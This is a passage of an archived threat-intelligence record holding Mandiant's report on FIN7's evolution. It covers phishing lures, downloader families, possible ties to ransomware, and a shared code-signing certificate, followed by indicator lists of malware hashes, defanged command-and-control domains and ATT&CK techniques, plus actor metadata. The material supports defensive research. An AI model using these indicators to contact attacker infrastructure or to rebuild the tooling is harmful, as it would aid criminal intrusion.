confidence.\r\nThroughout their campaigns, UNC3381 has used nearly identical Quickbooks-themed invoice lures and leveraged\r\nthe branding of the compromised account that they were sent from, providing additional legitimacy for their\r\nphishes. These emails contained a malicious link that goes through the analytics domain associated with the\r\nplatform they were sent from, before redirecting to a page typically hosted on a compromised domain.\r\nFigure 25: UNC3381 Quickbooks-themed phishing email\r\nUNC3381 has used multiple malware families in these campaigns, including WINGNIGHT and FLYHIGH, two\r\ndifferent downloader families which we’ve only observed being used by UNC3381. WINGNIGHT is a WSF-based downloader that utilizes VBScript, and FLYHIGH is a downloader written in C using the Excel XLL SDK,\r\nbut masquerades as using the Excel-DNA framework. In these campaigns, we observed both WINGNIGHT and\r\nFLYHIGH leading to BIRDWATCH, often leveraging additional compromised domains for both the download\r\nserver and the BIRDWATCH C2 controller. We’ve observed limited overlaps between UNC3381 and FIN7\r\ninfrastructure as well, including the use of the same DNS provider and AS.\r\nFIN7 and Ransomware\r\nMandiant published finished intelligence in 2020 which outlined evidence of FIN7’s possible shift in monetization\r\nof intrusions from payment card data to extortion operations.  Although FIN7’s operations have shifted\r\nsubstantially when compared to their older activity, as of publishing this report, Mandiant has not attributed any\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 18 of 27\n\ndirect deployment of ransomware to FIN7.  However, the possibility that FIN7 actors are engaging in ransomware\r\noperations is also substantiated by evidence outside of our intrusion data holdings and includes code usage, actor\r\ninfrastructure, and trusted third party sources.\r\nIn at least two incident response engagements in 2020, FIN7 intrusion operations were identified prior to\r\nransomware encryption, including the use of MAZE and RYUK. Similarly in 2021, Mandiant attributed active\r\nFIN7 intrusion activity during an incident response engagement involving ALPHV ransomware. In all these cases,\r\nthe ransomware deployment is currently attributed to separately tracked threat groups due to factors of the\r\ninvestigation and our visibility.\r\nIn addition to evidence produced from intrusion data, secondary artifacts suggest FIN7 played a role in at least\r\nsome DARKSIDE operations. A low global prevalence code signing certificate used by FIN7 in 2021 to sign\r\nBEACON and BEAKDROP samples was also used to sign multiple unattributed DARKSIDE samples recovered\r\nin the wild (Table 3). The specific mentioned code signing certificate used by FIN7 contained the SSL subject\r\ncommon name of “OASIS COURT LIMITED” (Figure 26).\r\nSerial Number:\r\n e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f\r\n Signature Algorithm: sha256WithRSAEncryption\r\n Issuer: C = GB, ST = Greater Manchester, L = Salford, O = Sectigo Limited, CN = Sectigo RSA Code Signing\r\n Validity\r\n Not Before: Dec 21 00:00:00 2020 GMT\r\n Not After : Dec 21 23:59:59 2021 GMT\r\n Subject: C = GB, postalCode = CO3 9FA, ST = Essex, L = Colchester, street = 10 Stoneleigh Park, O = OASI\r\nFigure 26: Code signing certificate used by FIN7, also used to sign multiple DARKSIDE ransomware samples\r\nFile MD5 Note\r\nab29b9e225a05bd17e919e1d0587289e DNS BEACON\r\n1c3b19163a3b15b39ae00bbe131b499a DARKSIDE\r\n230a681ebbcdba7ae2175f159394d044 DARKSIDE\r\nbf41fc54f96d0106d34f1c48827006e4 DARKSIDE\r\nc4da0137cbb99626fd44da707ae1bca8 DARKSIDE\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 19 of 27\n\n28e9581ab34297b6e5f817f93281ffac FIN7 BEACON\r\n38786bc9de1f447d0187607eaae63f11 FIN7 BEACON\r\n6fba605c2a02fc62e6ff1fb8e932a935 FIN7 BEAKDROP\r\nTable 3: Files signed with code certificate\r\nConclusion\r\nDespite indictments of members of FIN7 in 2018 and a related sentencing in 2021 announced by the U.S.\r\nDepartment of Justice, at least some members of FIN7 have remained active and continue to evolve their criminal\r\noperations over time. Throughout their evolution, FIN7 has increased the speed of their operational tempo, the\r\nscope of their targeting, and even possibly their relationships with other ransomware operations in the\r\ncybercriminal underground.\r\nAcknowledgements\r\nThank you to Van Ta, Rufus Brown, Dan Perez, Barry Vengerik, Kimberly Goody and Andrew Thompson for a\r\ntechnical review of this content and FIN7 research involved behind-the-scenes. In addition, thank you to all\r\nMandiant Incident Response and Managed Defense responders for harvesting the valuable intrusion data that\r\nenables our research.\r\nIndicators of Compromise (IOCs)\r\nIndicator Notes\r\n0c6b41d25214f04abf9770a7bdfcee5d BOATLAUNCH 32bit\r\n21f153810b82852074f0f0f19c0b3208 BOATLAUNCH 64bit\r\n02699f95f8568f52a00c6d0551be2de5 POWERPLANT\r\n0291df4f7303775225c4044c8f054360 POWERPLANT\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 20 of 27\n\n0fde02d159c4cd5bf721410ea9e72ee2 POWERPLANT\r\n2cbb015d4c579e464d157faa16994f86 POWERPLANT\r\n3803c82c1b2e28e3e6cca3ca73e6cce7 POWERPLANT\r\n5a6bbcc1e44d3a612222df5238f5e7a8 POWERPLANT\r\n833ae560a2347d5daf05d1f670a40c54 POWERPLANT\r\nb637d33dbb951e7ad7fa198cbc9f78bc POWERPLANT\r\nbce9b919fa97e2429d14f255acfb18b4 POWERPLANT\r\nd1d8902b499b5938404f8cece2918d3d POWERPLANT\r\nedb1f62230123abf88231fc1a7190b60 POWERPLANT\r\nfindoutcredit[.]com POWERPLANT C2\r\nagaincome[.]com POWERPLANT C2\r\nmodestoobgyn[.]com POWERPLANT C2\r\nmyshortbio[.]com POWERPLANT C2\r\nestetictrance[.]com POWERPLANT C2\r\ninternethabit[.]com POWERPLANT C2\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 21 of 27\n\nbestsecure2020[.]com POWERPLANT C2\r\nchyprediction[.]com POWERPLANT C2\r\nd405909fd2fd021372444b7b36a3b806 POWERTRASH Cryptor \u0026 CARBANAK Payload\r\n122cb55f1352b9a1aeafc83a85bfb165 CROWVIEW (BIRDWATCH/JssLoader Variant)\r\ndomenuscdm[.]com CROWVIEW/LOADOUT C2\r\n936b142d1045802c810e86553b332d2d LOADOUT\r\n23e1725769e99341bc9af48a0df64151 LOADOUT\r\n4d56a1ca28d9427c440ec41b4969caa2 LOADOUT\r\n50260f97ac2365cf0071e7c798b9edda LOADOUT\r\nspontaneousance[.]com LOADOUT C2\r\nfashionableeder[.]com LOADOUT C2\r\nincongruousance[.]com LOADOUT C2\r\nelectroncador[.]com LOADOUT C2\r\n6fba605c2a02fc62e6ff1fb8e932a935 BEAKDROP\r\n49ac220edf6d48680f763465c4c2771e BEACON\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 22 of 27\n\nastara20[.]com BEACON C2\r\ncoincidencious[.]com BEACON C2\r\n52f5fcaf4260cb70e8d8c6076dcd0157 Trojanized installer containing Atera Agent\r\n78c828b515e676cc0d021e229318aeb6 WINGNIGHT\r\n70bf088f2815a61ad2b1cc9d6e119a7f WINGNIGHT\r\n4961aec62fac8beeafffa5bfc841fab8 FLYHIGH\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls against more than 25 actions with Mandiant Security Validation.\r\nVID Name\r\nA150-527 Command and Control - FIN7, BATELEUR, Check-in\r\nA150-528 Command and Control - FIN7, GRIFFON, Check-in\r\nA151-165 Command and Control - FIN7, GRIFFON, DNS Query #1\r\nA151-166 Command and Control - FIN7, GRIFFON, DNS Query #2\r\nA104-585 Host CLI - FIN7, Local Javascript Execution via WMI and Mshta\r\nA150-546 Malicious File Transfer - FIN7, CARBANAK, Download, Variant #1\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 23 of 27\n\nA150-548 Malicious File Transfer - FIN7, CARBANAK, Download, Variant #3\r\nA150-710 Malicious File Transfer - FIN7, DICELOADER, Download, Variant #1\r\nA150-549 Malicious File Transfer - FIN7, DRIFTPIN, Download, Variant #1\r\nA150-550 Malicious File Transfer - FIN7, DRIFTPIN, Download, Variant #2\r\nA151-168 Malicious File Transfer - FIN7, GRIFFON, Download, JavaScript Variant\r\nA150-553 Malicious File Transfer - FIN7, GRIFFON, Download, Variant #1\r\nA150-554 Malicious File Transfer - FIN7, GRIFFON, Download, Variant #2\r\nA150-555 Malicious File Transfer - FIN7, GRIFFON, Download, Variant #3\r\nA150-572 Malicious File Transfer - FIN7, SUPERSOFT, Download, Variant #1\r\nA150-729 Malicious File Transfer - FIN7, TAKEOUT, Download, Variant #1\r\nA150-730 Malicious File Transfer - FIN7, TAKEOUT, Download, Variant #2\r\nA150-731 Malicious File Transfer - FIN7, TAKEOUT, Download, Variant #3\r\nA150-585 Phishing Email - Malicious Attachment, FIN7, BATELEUR DOC Lure\r\nA150-586 Phishing Email - Malicious Attachment, FIN7, GRIFFON DOCM Lure\r\nA151-167 Phishing Email - Malicious Attachment, FIN7, GRIFFON, Windows 11 Themed Lure\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 24 of 27\n\nA150-587 Phishing Email - Malicious Attachment, FIN7, Tracking Pixel\r\nA150-590 Protected Theater - FIN7, BATELEUR, Execution\r\nA151-044 Protected Theater - FIN7, CARBANAK, Execution\r\nA150-366 Protected Theater - FIN7, CULTSWAP, Execution\r\nA150-591 Protected Theater - FIN7, GRIFFON, Execution\r\nA151-170 Protected Theater - FIN7, GRIFFON, Execution, JavaScript Variant\r\nA151-169 Protected Theater - FIN7, GRIFFON, Execution, Word Document Variant\r\nMITRE ATT\u0026CK Mapping\r\nThroughout 2020 and 2021, Mandiant has observed FIN7 use the following techniques:\r\nExecution\r\nT1059: Command and Scripting Interpreter\r\nT1059.001: PowerShell\r\nT1059.003: Windows Command Shell\r\nT1059.005: Visual Basic\r\nT1059.007: JavaScript\r\nT1204.001: Malicious Link\r\nT1204.002: Malicious File\r\nT1569.002: Service Execution\r\n Initial Access\r\nT1195.002: Compromise Software Supply Chain\r\nT1199: Trusted Relationship\r\nT1566.001: Spearphishing Attachment\r\nT1566.002: Spearphishing Link\r\nImpact\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 25 of 27\n\nT1491.002: External Defacement \r\nResource Development\r\nT1583.003: Virtual Private Server\r\nT1588.003: Code Signing Certificates\r\nT1588.004: Digital Certificates\r\nT1608.003: Install Digital Certificate\r\nT1608.005: Link Target\r\nDefense Evasion\r\nT1027: Obfuscated Files or Information\r\nT1027.005: Indicator Removal from Tools\r\nT1036: Masquerading\r\nT1036.003: Rename System Utilities\r\nT1055: Process Injection\r\nT1070.004: File Deletion\r\nT1140: Deobfuscate/Decode Files or Information\r\nT1218.010: Regsvr32\r\nT1218.011: Rundll32\r\nT1497.001: System Checks\r\nT1553.002: Code Signing\r\nT1564.003: Hidden Window\r\nT1620: Reflective Code Loading\r\nCollection\r\nT1113: Screen Capture\r\nT1213: Data from Information Repositories\r\nT1560: Archive Collected Data\r\nLateral Movement\r\nT1021.001: Remote Desktop Protocol\r\nT1021.004: SSH\r\nCommand and Control\r\nT1071.001: Web Protocols\r\nT1090: Proxy\r\nT1095: Non-Application Layer Protocol\r\nT1105: Ingress Tool Transfer\r\nT1132.001: Standard Encoding\r\nT1573.002: Asymmetric Cryptography\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 26 of 27\n\nDiscovery\r\nT1012: Query Registry\r\nT1033: System Owner/User Discovery\r\nT1057: Process Discovery\r\nT1069: Permission Groups Discovery\r\nT1069.002: Domain Groups\r\nT1082: System Information Discovery\r\nT1083: File and Directory Discovery\r\nT1087: Account Discovery\r\nT1087.002: Domain Account\r\nT1482: Domain Trust Discovery\r\nT1518: Software Discovery\r\nCredential Access\r\nT1110.002: Password Cracking\r\nT1555.003: Credentials from Web Browsers\r\nT1558.003: Kerberoasting\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.mandiant.com/resources/blog/evolution-of-fin7\r\nhttps://www.mandiant.com/resources/blog/evolution-of-fin7\r\nPage 27 of 27", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.mandiant.com/resources/blog/evolution-of-fin7" ], "report_names": [ "evolution-of-fin7" ], "threat_actors": [ { "id": "c9617bb6-45c8-495e-9759-2177e61a8e91", "created_at": "2022-10-25T15:50:23.405039Z", "updated_at": "2026-04-10T02:00:05.387643Z", "deleted_at": null, "main_name": "Carbanak", "aliases": [ "Carbanak", "Anunak" ], "source_name": "MITRE:Carbanak", "tools": [ "Carbanak", "Mimikatz", "PsExec", "netsh" ], "source_id": "MITRE", "reports": null }, { "id": "9de1979b-40fc-44dc-855d-193edda4f3b8", "created_at": "2025-08-07T02:03:24.92723Z", "updated_at": "2026-04-10T02:00:03.755516Z", "deleted_at": null, "main_name": "GOLD LOCUST", "aliases": [ "Anunak", "Carbanak", "Carbon Spider ", "FIN7 ", "Silicon " ], "source_name": "Secureworks:GOLD LOCUST", "tools": [ "Carbanak" ], "source_id": "Secureworks", "reports": null }, { "id": "f6f91e1c-9202-4497-bf22-9cd5ef477600", "created_at": "2023-01-06T13:46:38.86765Z", "updated_at": "2026-04-10T02:00:03.12735Z", "deleted_at": null, "main_name": "WIZARD SPIDER", "aliases": [ "TEMP.MixMaster", "GOLD BLACKBURN", "DEV-0193", "UNC2053", "Pistachio Tempest", "DEV-0237", "Storm-0230", "FIN12", "Periwinkle Tempest", "Storm-0193", "Trickbot LLC" ], "source_name": "MISPGALAXY:WIZARD SPIDER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bb8702c5-52ac-4359-8409-998a7cc3eeaf", "created_at": "2023-01-06T13:46:38.405479Z", "updated_at": "2026-04-10T02:00:02.961112Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "ATK32", "G0046", "G0008", "Sangria Tempest", "ELBRUS", "GOLD NIAGARA", "Coreid", "Carbanak", "Carbon Spider", "JokerStash", "CARBON SPIDER" ], "source_name": "MISPGALAXY:FIN7", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b", "created_at": "2022-10-25T16:07:23.303713Z", "updated_at": "2026-04-10T02:00:04.530417Z", "deleted_at": null, "main_name": "ALPHV", "aliases": [ "ALPHV", "ALPHVM", "Ambitious Scorpius", "BlackCat Gang", "UNC4466" ], "source_name": "ETDA:ALPHV", "tools": [ "ALPHV", "ALPHVM", "BlackCat", "GO Simple Tunnel", "GOST", "Impacket", "LaZagne", "MEGAsync", "Mimikatz", "Munchkin", "Noberus", "PsExec", "Remcom", "RemoteCommandExecution", "WebBrowserPassView" ], "source_id": "ETDA", "reports": null }, { "id": "ed3810b7-141a-4ed0-8a01-6a972b80458d", "created_at": "2022-10-25T16:07:23.443259Z", "updated_at": "2026-04-10T02:00:04.602946Z", "deleted_at": null, "main_name": "Carbanak", "aliases": [ "Anunak", "Carbanak", "Carbon Spider", "ELBRUS", "G0008", "Gold Waterfall", "Sangria Tempest" ], "source_name": "ETDA:Carbanak", "tools": [ "AVE_MARIA", "Agentemis", "AmmyyRAT", "Antak", "Anunak", "Ave Maria", "AveMariaRAT", "BABYMETAL", "BIRDDOG", "Backdoor Batel", "Batel", "Bateleur", "BlackMatter", "Boostwrite", "Cain \u0026 Abel", "Carbanak", "Cl0p", "Cobalt Strike", "CobaltStrike", "DNSMessenger", "DNSRat", "DNSbot", "DRIFTPIN", "DarkSide", "FOXGRABBER", "FlawedAmmyy", "HALFBAKED", "JS Flash", "KLRD", "MBR Eraser", "Mimikatz", "Nadrac", "Odinaff", "POWERPIPE", "POWERSOURCE", "PsExec", "SQLRAT", "Sekur", "Sekur RAT", "SocksBot", "SoftPerfect Network Scanner", "Spy.Agent.ORM", "TEXTMATE", "TeamViewer", "TiniMet", "TinyMet", "Toshliph", "VB Flash", "WARPRISM", "avemaria", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "63061658-5810-4f01-9620-7eada7e9ae2e", "created_at": "2022-10-25T15:50:23.752974Z", "updated_at": "2026-04-10T02:00:05.244531Z", "deleted_at": null, "main_name": "Wizard Spider", "aliases": [ "Wizard Spider", "UNC1878", "TEMP.MixMaster", "Grim Spider", "FIN12", "GOLD BLACKBURN", "ITG23", "Periwinkle Tempest", "DEV-0193" ], "source_name": "MITRE:Wizard Spider", "tools": [ "TrickBot", "AdFind", "BITSAdmin", "Bazar", "LaZagne", "Nltest", "GrimAgent", "Dyre", "Ryuk", "Conti", "Emotet", "Rubeus", "Mimikatz", "Diavol", "PsExec", "Cobalt Strike" ], "source_id": "MITRE", "reports": null }, { "id": "a2d3f35f-3b29-4509-bff5-af2638140d39", "created_at": "2022-10-25T16:07:23.633982Z", "updated_at": "2026-04-10T02:00:04.695802Z", "deleted_at": null, "main_name": "FIN12", "aliases": [], "source_name": "ETDA:FIN12", "tools": [ "Agentemis", "BEERBOT", "BazarBackdoor", "BazarCall", "BazarLoader", "Cobalt Strike", "CobaltStrike", "KEGTAP", "TSPY_TRICKLOAD", "Team9Backdoor", "The Trick", "TheTrick", "Totbrick", "TrickBot", "TrickLoader", "bazaloader", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "bfded1cf-be73-44f9-a391-0751c9996f9a", "created_at": "2022-10-25T15:50:23.337107Z", "updated_at": "2026-04-10T02:00:05.252413Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "FIN7", "GOLD NIAGARA", "ITG14", "Carbon Spider", "ELBRUS", "Sangria Tempest" ], "source_name": "MITRE:FIN7", "tools": [ "Mimikatz", "AdFind", "JSS Loader", "HALFBAKED", "REvil", "PowerSploit", "CrackMapExec", "Carbanak", "Pillowmint", "Cobalt Strike", "POWERSOURCE", "RDFSNIFFER", "SQLRat", "Lizar", "TEXTMATE", "BOOSTWRITE" ], "source_id": "MITRE", "reports": null }, { "id": "d85adfe3-e1c3-40b0-b8bb-d1bacadc4d82", "created_at": "2022-10-25T16:07:23.619566Z", "updated_at": "2026-04-10T02:00:04.690061Z", "deleted_at": null, "main_name": "FIN7", "aliases": [ "APT-C-11", "ATK 32", "G0046", "Gold Niagara", "GrayAlpha", "ITG14", "TAG-CR1" ], "source_name": "ETDA:FIN7", "tools": [ "7Logger", "Agentemis", "Anubis Backdoor", "Anunak", "Astra", "BIOLOAD", "BIRDWATCH", "Bateleur", "Boostwrite", "CROWVIEW", "Carbanak", "Cobalt Strike", "CobaltStrike", "DICELOADER", "DNSMessenger", "FOWLGAZE", "HALFBAKED", "JSSLoader", "KillACK", "LOADOUT", "Lizar", "Meterpreter", "Mimikatz", "NetSupport", "NetSupport Manager", "NetSupport Manager RAT", "NetSupport RAT", "NetSupportManager RAT", "POWERPLANT", "POWERSOURCE", "RDFSNIFFER", "Ragnar Loader", "SQLRAT", "Sardonic", "Sekur", "Sekur RAT", "TEXTMATE", "Tirion", "VB Flash", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434115, "ts_updated_at": 1775792153, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c55324769777bee7344616b11f5823104754d75c.pdf", "text": "https://archive.orkl.eu/c55324769777bee7344616b11f5823104754d75c.txt", "img": "https://archive.orkl.eu/c55324769777bee7344616b11f5823104754d75c.jpg" } }